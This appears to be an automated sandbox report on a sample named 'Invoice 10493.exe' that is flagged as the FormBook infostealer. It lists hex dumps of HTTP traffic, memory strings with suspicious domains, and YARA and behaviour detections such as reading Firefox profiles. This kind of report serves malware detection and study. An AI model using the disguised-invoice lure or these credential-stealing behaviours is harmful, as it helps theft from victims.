1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 04 Dec 2024 16:15:14 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Wed, 04 Dec 2024 16:15:17 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 04 Dec 2024 16:15:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 04 Dec 2024 16:15:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: RAVCpl64.exe, 00000003.00000002.3402223545.0000000004E48000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.3402223545.0000000005F8E000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.000000000581E000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000046D8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: RAVCpl64.exe, 00000003.00000002.3402223545.000000000516C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000049FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1733328730.9784753976&other_args=eyJ1cmkiOiAiLzBnaX
            Source: RAVCpl64.exe, 00000003.00000002.3397437830.000000000072B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oztalkshw.store
            Source: RAVCpl64.exe, 00000003.00000002.3397437830.000000000072B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oztalkshw.store/20oo/
            Source: winrs.exe, 00000004.00000002.3399100655.00000000049FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.earbudsstore.shop/
            Source: winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: -4EF4J77B.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: winrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: -4EF4J77B.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: RAVCpl64.exe, 00000003.00000002.3402223545.0000000005AD8000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.0000000005368000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
            Source: winrs.exe, 00000004.00000002.3396065012.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3396065012.0000000003289000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1225378400.00000000032A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: winrs.exe, 00000004.00000002.3396065012.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3396065012.0000000003289000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1225378400.00000000032A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: winrs.exe, 00000004.00000002.3396065012.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3396065012.0000000003289000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.1225378400.00000000032A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: winrs.exe, 00000004.00000002.3396065012.0000000003246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
            Source: winrs.exe, 00000004.00000002.3396065012.000000000326A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
            Source: winrs.exe, 00000004.00000003.1224287033.0000000008500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
            Source: winrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: winrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: winrs.exe, 00000004.00000002.3400480362.000000000851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RAVCpl64.exe, 00000003.00000002.3402223545.00000000062B2000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.3402223545.0000000005C6A000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000054FA000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.0000000005B42000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3400291491.0000000006A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: winrs.exe, 00000004.00000003.1239625858.000000000858D000.00000004.00000020.00020000.00000000.sdmp, -4EF4J77B.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: RAVCpl64.exe, 00000003.00000002.3402223545.0000000004B24000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3399100655.00000000043B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1342780756.000000002ACB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zkdamdjj.shop/vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.3395750472.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398160795.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1052986194.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1051362204.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3398079757.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: Invoice 10493.exe, 00000000.00000000.935409043.0000000000894000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a0b9fdd9-c
            Source: Invoice 10493.exe, 00000000.00000000.935409043.0000000000894000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7e4587ce-6
            Source: Invoice 10493.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c9a2b48d-2
            Source: Invoice 10493.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d40c74e0-d
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Invoice 10493.exe
            Source: Invoice 10493.exe, 00000000.00000003.967319169.00000000046A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Invoice 10493.exe
            Source: Invoice 10493.exe, 00000000.00000003.966090402.00000000047FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Invoice 10493.exe
            Source: Invoice 10493.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@18/9
            Source: C:\Users\user\Desktop\Invoice 10493.exeFile created: C:\Users\user\AppData\Local\Temp\autC40D.tmpJump to behavior
            Source: Invoice 10493.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Invoice 10493.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: winrs.exe, 00000004.00000002.3400480362.0000000008533000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
